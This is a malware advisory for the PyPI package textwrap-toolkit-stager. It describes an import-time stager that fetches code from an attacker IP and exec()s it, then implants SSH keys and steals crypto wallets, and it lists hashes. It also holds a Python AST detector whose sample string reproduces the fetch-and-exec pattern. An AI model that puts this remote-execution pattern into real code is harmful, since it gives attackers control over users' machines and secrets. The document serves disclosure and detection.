Malicious package

textwrap-toolkit-stager (PyPI)

Malicious code in textwrap-toolkit-stager (PyPI). Remove it immediately and rotate any exposed credentials.

MAL-2026-5722
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall textwrap-toolkit-stager

What this malware does

On import textwrap_toolkit_stager, the package's __init__.py unconditionally fetches Python source from http://194.5.152.9:8080/hacks/textwrap-toolkit/textwrap_toolkit/__init__.py via urllib.request.urlopen and passes the response bytes directly to exec(code_bytes, {"__name__": "__main__"}). The fetch uses a bare IP over plaintext HTTP, with no version pinning, no hash verification, and errors silently swallowed. Any process that imports this package executes attacker-controlled Python code from 194.5.152.9 with the full privileges of the importing user. The package's advertised purpose ('lightweight utility for advanced text wrapping') has no implementation in the shipped code — the module's sole behavior is the remote stager. The package name itself self-describes the intent ('stager').

During import, the package downloads and executes an obfuscated script. The code then adds a new authorized SSH key and reports back the IP of the current environment. After that, the code also attempts to exfiltrate cryptocurrency wallet data.
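A static check for the fetch-and-exec pattern described above, added here as an example (not code from the advisory or from the package). It parses source with ast and never runs it; the function names, the sample string and its 192.0.2.10 documentation address are constructed for illustration, and only urllib.request fetches are covered.

```python
import ast

FETCH_CALLS = {"urlopen", "urlretrieve"}  # urllib.request entry points
EXEC_CALLS = {"exec", "eval"}

# Constructed sample modelled on the advisory text (documentation IP); never run.
SAMPLE_STAGER = '''
import urllib.request
try:
    with urllib.request.urlopen("http://192.0.2.10:8080/payload.py") as resp:
        code_bytes = resp.read()
    exec(code_bytes, {"__name__": "__main__"})
except Exception:
    pass
'''

def _call_name(call):  # trailing name of the callee: urlopen, request.urlopen
    f = call.func
    return f.id if isinstance(f, ast.Name) else getattr(f, "attr", None)

def _tainted(expr, names):
    """True if expr contains a fetch call or reads a name derived from one."""
    return any((isinstance(n, ast.Call) and _call_name(n) in FETCH_CALLS) or
               (isinstance(n, ast.Name) and n.id in names) for n in ast.walk(expr))

def _stored(target):
    return {n.id for n in ast.walk(target)
            if isinstance(n, ast.Name) and isinstance(n.ctx, ast.Store)}

def find_remote_exec(source):
    """Line numbers of exec()/eval() calls whose code argument was fetched."""
    tree = ast.parse(source)
    names, changed = set(), True
    while changed:  # propagate taint through assignments to a fixed point
        changed = False
        for n in ast.walk(tree):
            pairs = []
            if isinstance(n, ast.Assign):
                pairs = [(t, n.value) for t in n.targets]
            elif isinstance(n, ast.With):
                pairs = [(i.optional_vars, i.context_expr)
                         for i in n.items if i.optional_vars is not None]
            for target, value in pairs:
                new = _stored(target) - names
                if new and _tainted(value, names):
                    names, changed = names | new, True
    return sorted(n.lineno for n in ast.walk(tree)
                  if isinstance(n, ast.Call) and _call_name(n) in EXEC_CALLS
                  and n.args and _tainted(n.args[0], names))
```

Run it over the `__init__.py` files of installed or vendored packages; a non-empty result means code fetched at run time reaches `exec()` or `eval()` and the package needs manual review.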

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-textwrap-toolkit-stager

Reasons (based on the campaign):

  • backdoor

  • obfuscation

  • Downloads and executes a remote malicious script.

  • crypto-related

  • exfiltration-crypto

Malicious versions

1 flagged
1.0.0

Indicators of compromise (SHA-256)

4437efa58f3f2d623e1f838fae81387714723d9a9f001a22761add0dab13cdce
14493be47d247105b710bad8f013da1d30199190d7f65b765f587b6c82002e75
9fc85924d5672f7c91c2dd5e97c46cc48e3ae48084f906b7b0ba9d606c433fa4
b5c75bdcf659eb0064e71470edd2140960c88803c906fcc5a4c9ec21b970e887

Frequently asked questions

No. textwrap-toolkit-stager on PyPI has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006244 · 2026-06-textwrap-toolkit-stager · IN-MAL-2026-006243

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · reporter
